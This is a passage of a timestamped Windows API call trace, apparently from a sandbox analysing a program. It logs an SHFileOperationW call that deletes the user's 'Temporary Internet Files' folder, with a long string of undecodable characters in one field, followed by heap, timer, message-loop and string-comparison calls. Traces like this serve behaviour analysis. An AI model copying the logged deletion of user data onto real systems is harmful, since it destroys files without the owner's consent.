Internet Files", lpFilePart=0x8cf650*="Temporary Internet Files") returned 0x36 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74808 | out: hHeap=0x2af0000) returned 1 [0202.875] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temporary internet files")) returned 0x2416 [0202.876] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0203.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0203.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0203.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0203.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0203.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0203.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0203.197] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0203.197] TranslateMessage (lpMsg=0x8cf968) returned 0 [0203.198] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0203.198] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0203.198] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0203.198] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0203.198] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.198] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0203.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0203.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0203.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0203.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TileDataLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0203.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ileDataLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="leDataLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eDataLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DataLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ataLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0203.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aLayer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Layer", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0203.199] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0203.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0203.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77f58 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TileDataLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ileDataLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="leDataLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eDataLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DataLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ataLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0203.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aLayer", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0203.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0203.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0203.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0203.201] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0203.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0203.201] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: 